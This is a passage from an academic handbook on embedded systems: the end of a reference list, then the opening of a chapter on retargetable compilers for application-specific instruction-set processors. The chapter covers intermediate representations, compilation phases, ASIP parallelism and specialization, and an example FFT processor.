20th international workshop on software and compilers for embedded systems (SCOPES’17).
Kienhuis B, Deprettere EF, Van der Wolf P, Vissers K (2001) A methodology to design
programmable embedded systems. In: International workshop on embedded computer systems.
Springer, pp 18–37
Kirkpatrick S, Gelatt CD, Vecchi MP (1983) Optimization by simulated annealing. Science
220(4598):671–680
Klikpo EC, Khatib J, Munier-Kordon A (2016) Modeling multi-periodic simulink systems
by synchronous dataflow graphs. In: 2016 IEEE real-time and embedded technology and
applications symposium (RTAS). IEEE, pp 1–10
Koliogeorgi K, Voss N, Fytraki S, Xydis S, Gaydadjiev G, Soudris D (2019) Dataflow acceleration
of smith-waterman with traceback for high throughput next generation sequencing. In: 2019
29th international conference on field programmable logic and applications (FPL). IEEE, pp 74–
80
Kwok Y-K, Ahmad I (1999) Static scheduling algorithms for allocating directed task graphs to
multiprocessors. ACM Comput Surv 31(4):406–471. ISSN: 0360-0300. http://doi.org/10.1145/
344588.344618
Lee EA (2006) The problem with threads. Computer 39(5):33–42
Lee EA, Ha S (1989) Scheduling strategies for multiprocessor real-time DSP. In: 1989 IEEE global
telecommunications conference and exhibition ‘communications technology for the 1990s and
beyond’. IEEE, pp 1279–1283
Lee EA, Messerschmitt DG (1987) Synchronous data flow. Proc IEEE 75(9):1235–1245
Lee EA, Messerschmitt DG (1987) Static scheduling of synchronous data flow programs for digital
signal processing. IEEE Trans Comput 100(1):24–35
Lee EA, Parks TM (1995) Dataflow process networks. Proc IEEE 83(5):773–801
Lee EA, Seshia SA (2016) Introduction to embedded systems: a cyber-physical systems approach.
MIT Press, Cambridge, MA
Leroy X (2009) Formal verification of a realistic compiler. Commun ACM 52(7):107–115
Lesparre Y, Munier-Kordon A, Delosme J (2016) Evaluation of synchronous dataflow graph
mappings onto distributed memory architectures. In: 2016 Euromicro conference on digital
system design (DSD), pp 146–153. https://doi.org/10.1109/DSD.2016.52
Leupers R, Castrillon J (2010) MPSoC programming using the MAPS compiler. In: Proceedings of
the design automation conference (ASP-DAC), 2010 15th Asia and South Pacific, pp 897–902.
https://doi.org/10.1109/ASPDAC.2010.5419677
Leupers R, Aguilar MA, Eusse JF, Castrillon J, Sheng W (2017) MAPS: a software development
environment for embedded multicore applications. In: Ha S, Teich J (eds) Handbook of
hardware/software codesign. Springer, Dordrecht, pp 1–33. ISBN: 978-94-017-7358-4. https://
doi.org/10.1007/978-94-017-7358-4_2-1
Lin S, Wang L-H, Vosoughi A, Cavallaro JR, Juntti M et al (2015) Parameterized sets of dataflow
modes and their application to implementation of cognitive radio systems. J Sig Process Syst
80(1):3–18
Lohstroh M, Romero ÍÍ, Goens A, Derler P, Castrillon J, Lee EA, Sangiovanni-Vincentelli A
(2020) Reactors: a deterministic model for composable reactive systems. In: Chamberlain R,
Grimheden ME, Taha W (eds) Cyber physical systems. Model-based design – proceedings of
the 9th workshop on design, modeling and evaluation of cyber physical systems (CyPhy 2019)
and the workshop on embedded and cyber-physical systems education (WESE 2019). Springer
International Publishing, New York City, pp 59–85. ISBN: 978-3-030-41131-2. https://doi.org/
10.1007/978-3-030-41131-2_4
Madronal D, Arrestier F, Sancho J, Morvan A, Lazcano R et al (2019) PAPIFY: automatic
instrumentation and monitoring of dynamic dataflow applications based on PAPI. IEEE Access
7:111801–111812
Manolache S, Eles P, Peng Z (2008) Task mapping and priority assignment for soft real-time
applications under deadline miss ratio constraints. ACM Trans Embed Comput Syst (TECS)
7(2):1–35
Marwedel P, Bacivarov I, Lee C, Teich J, Thiele L et al (2011) Mapping of applications to MPSoCs.
In: Proceedings of the 9th international conference on hardware/software codesign and system
synthesis (CODES+ISSS). Springer, New York, NY, pp 109–118
Schuermans S, Leupers R (2019) Power estimation on electronic system level using linear power
models. Springer, Cham
Schwarzer T, Weichslgartner A, Glaß M, Wildermann S, Brand P, Teich J (2017) Symmetry-
eliminating design space exploration for hybrid application mapping on many-core architec-
tures. IEEE Trans Comput-Aided Des Integr Circuits Syst 37(2):297–310
Sérot J (2020) HoCL: high level specification of dataflow graphs. In: Proceedings of the
32nd international symposium on implementation and application of functional languages
(IFL 2020) University of Kent, pp 244–253. https://www.cs.kent.ac.uk/events/2020/ifl20/
ifl2020draftproceedings.pdf
Singh AK, Kumar A, Srikanthan T (2011) A hybrid strategy for mapping multiple throughput-
constrained applications on MPSoCs. In: 2011 proceedings of the 14th international conference
on compilers, architectures and synthesis for embedded systems (CASES). IEEE, pp 175–184
Stemmer R, Vu H-D, Grüttner K, Le Nours S, Nebel W, Pillement S (2020) Towards probabilistic
timing analysis for SDFGs on tile based heterogeneous MPSoCs
Stuijk S, Geilen M, Theelen B, Basten T (2011) Scenario-aware dataflow: modeling, analysis
and implementation of dynamic applications. In: 2011 international conference on embedded
computer systems: architectures, modeling and simulation. IEEE, pp 404–411
Synopsys Signal Processing WorkSystem (SPW) (2013) The Fastest Path from Innovation to
Implementation of Digital Signal Processing Systems. http://www.eigen.in/pdf/SPW.pdf
Synopsys System Studio (2010) https://news.synopsys.com/index.php?s=20295&item=123136
Teich J, Henkel J, Herkersdorf A, Schmitt-Landsiedel D, Schröder-Preikschat W, Snelting G (2011)
Invasive computing: an overview. In: Multiprocessor system-on-chip. Springer, New York, NY,
pp 241–268
The Multicore Association, Inc (2015) Software-hardware interface for multi-many-core (SHIM)
specification, V1.0. The Multicore Association, Inc
Thiele L, Chakraborty S, Naedele M (2000) Real-time calculus for scheduling hard real-time
systems. In: 2000 IEEE international symposium on circuits and systems (ISCAS), vol 4. IEEE,
pp 101–104
Thiele L, Bacivarov I, Haid W, Huang K (2007) Mapping applications to tiled multiprocessor
embedded systems. In: ACSD’07: proceedings of the seventh international conference on
application of concurrency to system design. IEEE Computer Society, Washington, DC, pp 29–
40. ISBN: 0-7695-2902-X. https://doi.org/10.1109/ACSD.2007.53
Tretter A (2018) On efficient data exchange in multicore architectures. PhD thesis. ETH Zurich,
206pp. https://www.research-collection.ethz.ch/handle/20.500.11850/309314
Van Stralen P, Pimentel AD (2010) A high-level microprocessor power modeling technique based
on event signatures. J Sig Process Syst 60(2):239–250
Van Stralen P, Pimentel AD (2010) A trace-based scenario database for high-level simulation
of multimedia MPSoCs. In: 2010 international conference on embedded computer systems:
architectures, modeling and simulation. IEEE, pp 11–19
Weichslgartner A, Wildermann S, Gangadharan D, Glaß M, Teich J (2018) A design-time/run-
time application mapping methodology for predictable execution time in MPSoCs. ACM Trans
Embed Comput Syst (TECS) 17(5):89
Wilhelm R, Engblom J, Ermedahl A, Holsti N, Thesing S et al (2008) The worst-case execution-
time problem—overview of methods and survey of tools. ACM Trans Embed Comput Syst
7(3):1–53. ISSN: 1539-9087. https://doi.org/10.1145/1347375.1347389
Yviquel H, Lorence A, Jerbi K, Cocherel G, Sanchez A, Raulet M (2013) Orcc: multimedia
development made easy. In: Proceedings of the 21st ACM international conference on
multimedia MM’13. ACM, Barcelona, pp 863–866. ISBN: 978-1-4503-2404-5. https://doi.org/
10.1145/2502081.2502231
Yviquel H, Sanchez A, Mickaël R, Casseau E (2017) Multi-core runtime for dynamic dataflow
video decoders, Technical Report. IETR/INSA Rennes, IRISA, Inria Rennes. https://hal.
archives-ouvertes.fr/hal-01503378
Retargetable Compilation
32
Gert Goossens, Dirk Lanneer, Johan Van Praet, and Werner Geurts
Contents
Introduction and Historical Perspective . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1148
Compiler Construction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1149
Compiler Frameworks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1149
Retargetable Compilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1151
Outline of This Chapter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1153
Anatomy of a Compiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1153
Intermediate Representations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1153
Compilation Phases and Dependencies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1154
Architectural Scope of ASIPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1161
Parallelism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1162
Specialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1164
Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1166
Retargetable Compilers for ASIPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1167
Processor Intermediate Representations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1170
Retargetable Compiler Optimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1171
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1185
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1186
Abstract
Keywords
Compiler Construction
The history of software compilation spans more than half a century. Early compilers
were merely translation tools that turned source language statements into small
sequences of assembly code. Specific local optimizations were then applied to
the assembly code, referred to as peephole optimizations. The translation process
would use custom-made translation rules for the specific processor target. Around
the early 1980s, compiler construction became a more established engineering
discipline, focusing on general-purpose CPUs. Central to these developments
was the introduction of reusable concepts like intermediate representation (IR)
formats, a more common understanding of compilation phases, and a
basic foundation of optimization algorithms used in those phases (see section
“Compilation Phases and Dependencies”). This knowledge accumulated in several
reference textbooks on compiler construction. Somewhat iconic was the “Dragon”
textbook, nicknamed after its cover image (Aho et al. 1986). Its more recent revision
continues to be a basis of many compiler courses today (Aho et al. 2007). Other
often-cited compiler textbooks include (Muchnick 1997; Morgan 1998; Fischer and
LeBlanc 1991; Allen and Kennedy 2001).
Compiler Frameworks
Retargetable Compilers
Retargetable compilers may reuse elements from compiler frameworks like GCC
or LLVM. However, the compiler architecture necessarily differs in certain aspects,
especially when it comes to the automatic retargeting of the compiler back end (code
generator). The authors contend that the term retargetable compiler is sometimes
used incorrectly to refer to compiler frameworks.
Retargetable compilation emerged as a dedicated field out of compiler research
in the mid-1990s. Relevant research work can be found in an early contributed
volume (Marwedel and Goossens 1995), in proceedings of subsequent editions of
the International Workshop on Code Generation for Embedded Processors, later
renamed into SCOPES (International Workshop on Software and Compilers for
Embedded Systems n.d.), and in more recent survey works such as (Leupers and
Marwedel 2013).
As of 2000, the development of retargetable compilers based on ADLs spurred
the introduction of broader methodologies and tools that encompassed the entire
design cycle of ASIP architectures. The idea behind such methodologies is that
designers can rapidly explore the performance of an ASIP architecture by describing
it in an ADL, use the retargetable compiler to compile representative application
benchmarks on the architecture, and measure the performance of the generated
code. By profiling the generated code, architectural hotspots can be identified, which
reveal opportunities for tuning the ASIP architecture modeled in the ADL, for the
intended application domain. Such a rapid architectural exploration cycle is only
feasible if retargeting the compiler is an instantaneous process, which is not the
case with standard compiler frameworks. A number of commercial ASIP design
solutions have become available, such as Synopsys’ ASIP Designer tool (Synopsys
n.d.-b), Cadence’s extensible processor IP product called Xtensa (Cadence n.d.-b),
and the Codasip Studio tool (Codasip n.d.-b). In addition to a retargetable compiler,
ASIP design tools typically also contain instruction-set simulation and register-
transfer level (RTL) hardware generation tools that work from the same ADL as
the retargetable compiler.
The concept of ASIPs and the interest in retargetable ASIP design tools has
recently been reinforced by the emergence of RISC-V, an open-source processor
architecture technology (Waterman and Asanović 2019; Waterman et al. 2021).
One of RISC-V’s use models is as a baseline architecture to which designers can
add domain-specific extension instructions. The RISC-V instruction-set architecture
reserves opcode space to encode such extension instructions. ADL models of
RISC-V have been developed, and ASIP design tools are being used to explore
instruction extensions and to automatically obtain a compiler, simulator, and
RTL implementation of the extended RISC-V processor (Synopsys 2022; Codasip
n.d.-a).
This chapter discusses retargetable compilers for ASIPs. As a basis for the
discussion, section “Anatomy of a Compiler” first provides an introduction into the
structure of compilers for general-purpose processors, as commonly understood in
the engineering community. Section “Architectural Scope of ASIPs” zooms in on
the architectural scope of ASIPs, which differs from general-purpose processors
in several aspects and therefore imposes specific requirements on retargetable
compilers for ASIPs. Section “Retargetable Compilers for ASIPs” then describes
how these requirements can be addressed by combining existing and new compiler
technologies.
Anatomy of a Compiler
Compilers transform application source code into executable code for the pro-
cessor target in multiple steps, referred to as compilation phases. Within such
compilation phases, specific optimization algorithms may be applied. Information
about the application code is represented in an internal data structure, called
intermediate representation (IR). Throughout the compilation process the IR is
gradually transformed and refined to reflect successive decisions taken by the
compiler. Section “Intermediate Representations” provides a short introduction on
IRs. Section “Compilation Phases and Dependencies” discusses optimization phases
in more detail.
Intermediate Representations
An IR describes the application at successive stages of the compilation process,
ranging from a form close to the source code down to
the machine code for the application in assembly or binary form. The IR can reside
in computer memory, but many compilers also allow the dumping of the IR in text
or binary files (for example, in LLVM’s bit-code format) at intermediate points, and
the reading of these files to resume the compilation process.
After the initial parsing of the application source code and the initial data-flow
analysis (see sections “Front End” and “Middle End”) the IR often takes a form that
explicitly denotes the following information:
1. Linear code sequences called basic blocks, composed of operations and
information on their mutual data dependencies. Examples of such representations are:
• Static single-assignment (SSA) form (Cytron et al. 1991). This is essentially
a collection of assignment statements in which each assigned variable has a
unique name. Two statements have a data dependency when they respectively
write and read the same named variable.
• Data-flow graphs (DFGs) (Dennis 2011). These are directed graphs in which
nodes represent operations and edges represent data dependencies between
them.
2. Control dependencies between the basic blocks. These are typically represented
in a directed graph called control-flow graph.
For example, the GCC and LLVM compilers’ initial phases use SSA forms
combined with a control-flow graph. ASIP Designer’s retargetable compiler uses
a control and data-flow graph (CDFG) model, which nests data-flow graphs in a
control-flow graph (Van Praet 1997).
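As a toy illustration of such IRs (a sketch, not the actual data structures of any of these frameworks), a basic block can be stored as a data-flow graph whose edges follow directly from definition–use relationships:

    # Sketch: a basic block as a data-flow graph. Nodes are operations,
    # edges run from a value's definition to each of its uses.
    block = [
        ("t1", "mul", ["a", "b"]),   # t1 = a * b
        ("t2", "add", ["t1", "c"]),  # t2 = t1 + c
        ("t3", "add", ["t1", "t2"]), # t3 = t1 + t2
    ]
    defs = {dst: i for i, (dst, _, _) in enumerate(block)}
    edges = [(defs[src], i)          # producer -> consumer dependencies
             for i, (_, _, srcs) in enumerate(block)
             for src in srcs if src in defs]
    print(edges)                     # [(0, 1), (0, 2), (1, 2)]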
More recently, enhanced IRs with support for domain-specific compilation have
been proposed. An example is the multilevel intermediate representation (MLIR)
(Lattner et al. 2021), which uses enhanced data-flow graph models with support for
loop structure and memory layout transformations, offered within a compiler frame-
work that supports language-specific transformations and optimizations. MLIR has
been used to build compilers for domain-specific programming languages like
TensorFlow used for machine learning applications, among others.
Compilation Phases and Dependencies

Some authors would refer to the four stages (left hand) as compilation phases, others
would consider the more detailed steps (right hand) as compilation phases. In this
chapter, the latter convention is followed.
Compilation phases are often executed in a predetermined sequence. However,
the compiler may apply mechanisms for phase coupling, i.e., the fact that mutual
dependencies between phases must be accounted for to generate efficient executable
code. This may be achieved by using predictors for a late phase’s optimization result
in an earlier phase, by backtracking from a late to an earlier compilation phase, or
by applying certain phases multiple times in a full compilation pass.
Front End
The compiler front end parses all application source files and builds an IR repre-
sentation for them. Parsing consists of lexical, syntax, and semantic analysis steps
(Grune and Jacobs 1990). Well-known parser generation tools include Lex/Yacc
(Levine et al. 1992), Flex/Bison (Levine 2009), and ANTLR (Parr 2007). Prior
to actual parsing, a language preprocessor may be called. This is essentially a
language-independent tool that can perform tasks like conditional activation of code
portions, header file inclusion, and macro expansion.
Middle End
The compiler middle end performs optimizations on the IR that are in principle
applicable regardless of the processor target. In reality, some optimizations may only
make sense if the processor target contains certain instructions or hardware features,
and thus may be omitted if this is not the case. The optimizations are implemented
in distinct compilation phases. Some of the most common compilation phases are
described next.
Data-Flow Analysis
This initial phase builds the SSA form or data-flow graph and the control-flow graph,
which represent the application source code. An important part of the analysis is
to determine the valid data dependencies between operations that define named
variables and operations that use named variables. The input is an IR description
that represents a sequential order of statements (assuming that the source code
is described in a sequential language like C or C++). For every assignment and
every use of a given variable, a reaching-definitions analysis is also carried out,
to determine whether the variable is intermediately overwritten by another
assignment. If a variable is assigned multiple times, each assignment gets a unique
variable instance name, and all uses of the variable are replaced by uses of the right
instance. Data-flow analysis is important to enable the exploitation of instruction-
level parallelism (see instruction scheduling phase in the compiler back end, in
section “Back End”).
Alias analysis (also known as points-to analysis or memory reference disam-
biguation) is another important part of data-flow analysis. It deals with memory
references in the application source code in the form of global or static variables
or of pointers. It checks whether two memory references can ever refer to the same
memory location, in which case a dependency must be assumed if at least one of the
references is a write-to-memory operation. An example of alias analysis (explained
using C code) is shown in Fig. 3.
Address Generation
In this phase, address expressions are introduced for global and static variables in the
application code that are to be stored in memories, considering the addressing modes
that are available on the processor target. The computed results of these address
expressions are then used by the load and store operations that access these variables.
Fig. 4 Pointer analysis, assuming that the processor supports indexed addressing (bottom left) or
indirect addressing with pointer post-modification (bottom right). In the latter case, arrays A[] and
B[] can be accessed with independent pointers that are induction variables. Note: This example
assumes a word-addressable memory, with int mapping into a single word
Control-Flow Optimization
This phase deals with control-flow statements in the source code, represented in
the application’s control-flow graph. Multiple optimizations can be applied, aiming
at the generation of faster or more compact machine code. A few examples are
discussed next.
Function in-lining is a process whereby function calls are substituted by the
instantiated body of the function that was called. This avoids the overhead associated
with the subroutine call and return mechanisms that would traditionally be used
to implement function calls, at the expense of increased code size. After in-
lining, each instance of the function will be optimized specifically within its own
context. C and C++ compilers can be given hints to perform function in-lining by
annotating function definitions with the inline specifier in the application source code.
Many compilers use heuristics to decide about the automatic in-lining of functions.
Another control-flow optimization relates to the implementation of switch state-
ments. Small switch statements can be implemented as conditional branches, but for
larger ones the compiler may introduce an array of pointers to different parts of the
code in program memory, called a jump table.
A final control-flow optimization example is the replacement of a jump-based
implementation of small-size if-then-else blocks of code by either speculative or
predicated execution. In case of speculative execution, the operations in both the
then and the else branch are executed unconditionally followed by a conditional
selection of the results. This requires that the processor target has a conditional
select instruction. In case of predicated execution, the operations in both branches
are executed but they are guarded by opposite conditions. This requires that
the processor target has guarded instructions, i.e., instructions with an additional
Boolean input that determines if the results will be actually stored.
Loop Transformation
Loops (such as for-loops and while-loops) are control-flow statements in the source-
code language that specify iteration. By default, a loop can be implemented with a
conditional branch instruction that jumps back to the entry point as long as the
conditional loop test evaluates to true. In the loop transformation phase, the compiler
may decide to implement loops in more efficient ways. Some processors offer
zero-overhead loops, whereby a loop test based on a loop counter is executed
transparently in hardware while the instructions from the loop body are executing.
The compiler determines which for-loops from the application can be implemented
using zero-overhead loops. Only a limited number of nested for-loops can be
mapped into zero-overhead loops, due to capacity limitations of the loop test
hardware.
Certain processors support single-instruction multiple-data (SIMD) processing,
a form of data-level parallelism with instructions operating on vector datatypes.
In such cases, the loop transformation phase in the compiler may try to introduce
auto-vectorization, i.e., transform loops with scalar code into vector code. Auto-
vectorization has roots in early Fortran compilers (Allen and Kennedy 1987), is
supported for sub-word parallelism (also known as packed SIMD) in compilers for
CPUs with extensions like Intel MMX (Bik et al. 2002), and is being researched for wider use cases,
for example, in LLVM (LLVM Project n.d.-c).
Expression Optimization
Multiple optimizations can be applied to arithmetic and logic expressions repre-
sented in the IR, with the aim to generate faster or more compact machine code. A
few examples are discussed next; a combined code sketch follows the list.
• Strength reduction replaces operations with equivalent but less expensive ones.
For example, in case of array index expressions in loops, multiplications can
often be replaced by additions.
• Constant folding is the process of recognizing and evaluating constant expres-
sions at compile time rather than computing them at runtime. Terms in constant
expressions are typically simple literals, such as the integer literal 2, but they may
also be variables of which the value is known at compile time.
• Common sub-expression elimination is an optimization that searches for
instances of identical expressions (i.e., they all evaluate to the same value) and
analyzes whether it is worthwhile replacing them with a single variable holding
the computed value.
• Dead-code elimination removes expressions from the program of which the
result is never used.
Back End
The back end of the compiler, also called the code generator, is the stage where
the optimized IR is mapped into a sequence of machine instructions
for the target processor. As mentioned before, compiler frameworks typically
assume that target-specific back ends are built, which may reuse some common
infrastructure or optimizations. In the context of ASIP design tools, the concepts and
technologies used in the back end had to be reconsidered, to enable fast automatic
retargetability of the back end within a wide scope of ASIP architectures. This
will be addressed in sections “Architectural Scope of ASIPs” and “Retargetable
Compilers for ASIPs”. Nonetheless, the definition of compilation phases in the back
end as known from compiler construction still applies.
For the purposes of this chapter, the following compilation phases are dis-
tinguished (details are described in sections “Code Selection” to “Instruction
Scheduling”):
• Code selection. This phase partitions the IR into small patterns of operations,
referred to as operation bundles, that can each be implemented in a single
instruction of the processor target. Typically, the operations in one such pattern
are connected by data dependencies.
• Register allocation. This phase allocates the variables that constitute inputs or
outputs of operation bundles to storage locations in the processor, i.e., to registers
or data memories.
• Register assignment. This is sometimes considered part of register allocation.
Most processors have register files, i.e., groups of registers with common read
and write ports of which the individual register fields can be directly addressed
from the instruction word. Register assignment then refers to the selection of
individual register fields for variables allocated to the same register file.
• Instruction scheduling. This phase orders the execution of the operation bundles
in time. The objective typically is to determine an instruction schedule that
minimizes the number of instruction cycles required to execute the application.
To that effect, the scheduler must exploit the instruction-level parallelism that is
supported by the processor. On the one hand, the scheduler will try to overlap the
execution of consecutive instructions by applying instruction pipelining. On the
other hand, if the processor supports instruction-word parallelism the scheduler
will try to schedule multiple operation bundles in parallel, merging them into a
single parallel instruction.
Linker
Once all source files in a program have been compiled to object files, the linker
combines these object files into a single executable file. This may also include any
precompiled library functions that were called from the application source code. An
important function of the linker is to substitute all references to data and program
memories that occur in the object files, with absolute addresses in these memories.
This is called relocation.
Since the linker has a view on the code from the complete program, there is a
potential for performing so-called whole-program optimizations in the linker. For
example, the compiler’s middle end may already have performed function in-lining
on the code that stems from a single source file. At link time, the linker may
perform additional in-lining of functions defined in one source file at the point
where they are called in another source file. It is however not obvious for the
linker to undo sophisticated optimizations that were already applied at file level
in the compiler’s middle end and back end. Compilers like GCC and LLVM offer
a link-time optimization option, which delays such optimizations to the linker. The
linker is given access to higher-level IRs for code from multiple source files. It then
combines them into a single IR representing the whole program, and calls the middle
end again to apply its optimizations.
Linkers sometimes also perform local optimizations to reduce the code size
(i.e., number of bytes in program memory) of the eventual executable. Reverse
in-lining is an optimization that searches for instruction sequences in the code
that occur multiple times in the exact same form, and replaces each occurrence of
such a sequence by a call to a subroutine that implements the sequence once. This
slightly increases the application’s cycle count due to the subroutine call and return
overhead.
Architectural Scope of ASIPs
Many models and techniques for compiler construction that have been developed
over time and found their way into popular compiler frameworks like GCC
and LLVM (see section “Anatomy of a Compiler”) were originally intended
for general-purpose CPUs. Typical architectural characteristics of general-purpose
CPUs include:
• They have a single central register file of which all the register fields are equally
accessible as sources or destinations of arithmetic and logic instructions.
• The allowed sizes (i.e., number of bits) of data types are restricted to powers of 2.
• There is (only) a single address space for memories.
• Memories are (only) byte addressable.
• There is no distinction between memory address (i.e., pointer) and integer
datatypes.
• Instruction-word parallelism is restricted. CPUs often (only) support the sequen-
tial execution of instructions that do not control parallel functional units,
albeit that some CPUs may support dynamic multi-issuing of such instruction
sequences onto a limited number of parallel units.
It can be noted that GCC and LLVM have been ported to processor architec-
tures with different characteristics, but only at the expense of significant custom
development.
While ASIP architectures often reuse a number of architectural features from
general-purpose CPU architectures, they typically differ in many respects. Figure 5
lists various features that, in the authors’ view, can be found in the instruction-set
architecture (ISA) of contemporary ASIP architectures.
Two dimensions are distinguished in the optimization space: parallelism and spe-
cialization. ASIPs will typically combine selected elements from both dimensions,
yielding superior performance for the targeted application domain.
Parallelism
Instruction-Level Parallelism
Instruction-level parallelism (ILP) can be achieved by combining instruction
pipelining and instruction-word parallelism.
(a) Instruction pipelining
This allows the execution of consecutive instructions to overlap in time. Some
processors have an interlocked pipeline, in which hardware inserts stall
cycles (also called interlocks) to resolve hazards. More frequently, ASIPs use an
exposed pipeline, where the compiler must schedule instructions in such a way
as to avoid hazards, if needed by inserting software stalls (i.e., no-operation or
nop instructions). This has the advantage of better cycle-time predictability at
compile time. Additionally, a common mechanism to eliminate hazards due to
data dependencies in ASIPs is to add bypass networks for register files, which
can directly feed computational results of one instruction to the inputs of a
subsequent instruction before the results are actually stored in the register file.
(b) Instruction-word parallelism
This implies that multiple operations can be executed concurrently on different
functional units, controlled from a single instruction in the program. These
parallel instructions are selected and scheduled statically, i.e., at compile time,
by the compiler.
The instruction word can be orthogonal, meaning that it is composed of
multiple fields (also called slots), each of which controls one such functional unit.
This typically results in a very-long instruction-word (VLIW) architecture.
ASIPs however often support instruction-word parallelism in encoded instruc-
tion words. In this case, only those combinations of parallel operations are
supported that are considered useful for the application domain. The supported
combinations can be encoded in a shorter instruction word, which saves space in
program memory and reduces power that would otherwise be consumed in large
instruction fetches. ASIPs may also have variable-length instructions, with
short instructions encoding mostly single operations and longer instructions
encoding parallel operations and immediate values (i.e., constants loaded from
program memory).
Note that the concept of dynamic multi-issuing, whereby the processor
hardware tries to execute instructions from a sequential stream in parallel
(as in superscalar processors), is less common in ASIP architectures. Multi-
issuing results in less predictable performance, which is undesirable as ASIP
applications typically have real-time performance constraints.
Data-Level Parallelism
This form of parallelism is useful for application domains with large datasets in
which identical operations must be applied to multiple data items. Examples include
pixels in an image or a video frame, or subcarriers in an OFDM wireless modem.
By organizing the data in vectors, and letting single instructions apply the same
operation concurrently to all vector elements, high performance can be reached
while keeping the instruction word short. This is referred to as vector processing
or single-instruction multiple-data (SIMD) processing.
Some architectures may introduce sub-word parallelism by mapping vectors with
narrow elements onto regular data words, such as four 8-bit elements onto a 32-bit
word. This is referred to as packed SIMD. Most ASIPs with SIMD support however
contain separate functional units, registers, and memories that support significantly
wider vectors. Today the term wide SIMD is often used to refer to vector sizes on the
order of 1 Kbit or higher. ASIPs often support multiple combinations of vector size
and element word length mapped on the same processor resources. For example, a
512-bit data path may support both vectors with 32 elements of 16 bits each and
vectors with 16 elements of 32 bits each.
Task-Level Parallelism
Whereas ILP and SIMD aim at exploiting parallelism in a single thread of control,
task-level parallelism refers to the parallel execution of multiple threads of control
(i.e., independently evolving program parts or tasks). One such solution is a
multicore architecture, in which every core is an ASIP that may be optimized for
its tasks. An alternative solution is a single ASIP that supports multithreading. In
this case, multiple tasks are interleaved using the same functional units. Typically,
but not necessarily, each task uses its own set of registers.
Specialization
Datatypes
In addition to the built-in datatypes offered by the application programming
language, ASIP architects can introduce any application-specific datatypes. They
can be primitive datatypes that are physically supported by the processor resources,
or else they have to be expanded into primitive datatypes during the lowering phase
in the compiler’s middle end (see section “Middle End”).
Typical examples of datatypes on ASIPs include integer, fractional, floating-
point, bit-string, complex, and vector (SIMD) types. These datatypes are not
restricted to sizes that are powers of two but can have any number of bits that
best suit the application domain. To reduce power consumption and silicon area,
the ASIP architect may reduce datatype sizes to the minimum number that still
supports the dynamic range required by the applications. For example, convolutional
neural network applications often require less than 8-bit precision to represent
intermediate-layer data without affecting the classification accuracy (Moons et al.
2016). On the other side of the spectrum, high-performance SIMD architectures
may have resources carrying vectors of hundreds of bits (see section “Parallelism”).
The interpretation of the bits can be customized. For example, different from
the IEEE 754 standard for floating-point arithmetic, one may define a floating-point
datatype with custom sizes for mantissa and exponent, or without support for special
numbers and exceptions if those are not required by the application. ASIPs for
machine learning applications may support the bfloat16 format (Wang and Kanwar
2019).
Functional Units
Functional units are the resources that implement the ASIP’s primitive functions.
ASIPs often have an arithmetic and logic functional unit (ALU), with primitive
arithmetic and logic functions. Address computations for memory accesses are often
performed on dedicated address generation units (AGUs), in
parallel with the operations in the functional units. However, in some cases, direct
memory operands may be preferred.
The storage architecture (i.e., registers and local data memories) of an ASIP
and the connectivity between functional units and storages are often chosen such
that they mimic typical data-flow patterns from the application code. Such ASIP
architectures often have multiple specialized data memories and small distributed
register files or individual registers that are locally connected to inputs and outputs
of functional units. This is referred to as a heterogeneous storage architecture. As
a result, these data-flow patterns can be mapped to the architecture with minimal
overhead in terms of the required data moves, resulting in highly efficient code.
As mentioned in section “Parallelism”, there is often a desire to keep instruction
words relatively short, in order to save space in program memory and reduce
power consumption. Distributed, locally connected register files help to reduce
the instruction word length, as they require only a few opcode bits. In ASIPs with
high amounts of instruction-word parallelism, further reductions can be obtained
by only allowing sub-ranges of register files as operand or result registers, and by
introducing register coupling. Examples of the latter are instructions for which the
destination register is always equal to one of the operand registers (referred to as a
read-modify-write instruction), and instructions that always use the same index for
their left and right operand register files.
Example
Figure 6 shows an example ASIP architecture optimized for FFT and DFT
algorithms in wireless baseband applications, taken from (Brockmeyer 2010;
Goossens 2021). It illustrates several of the ASIP architectural features introduced in
sections “Parallelism” and “Specialization”.
Fig. 6 Functional units, storages, and interconnect architecture of an example ASIP optimized for
FFT and DFT, illustrating multiple forms of parallelism and specialization
The ASIP is optimized for the efficient
implementation of the Good-Thomas prime-factor algorithm for DFT.
The example ASIP is a SIMD architecture with a vector size of 192 bits,
composed of 6 elements of 32 bits. Each element represents a complex number with
16 bits for both the real and the imaginary part. The choice of 6 elements stems from
the fact that all DFT sizes that must be supported in the prime-factor algorithm are
multiples of 6. By exploiting this fact, a smaller silicon area and power consumption
can be obtained than what is possible with general-purpose vector processors.
The ASIP has three specialized functional units. VU0 implements special primi-
tive functions for butterfly operations. VU1 implements basic vector multiplications
but also more complex operation patterns like vsummul(), which adds the results
of two complex vector multiplications and occurs frequently in the application
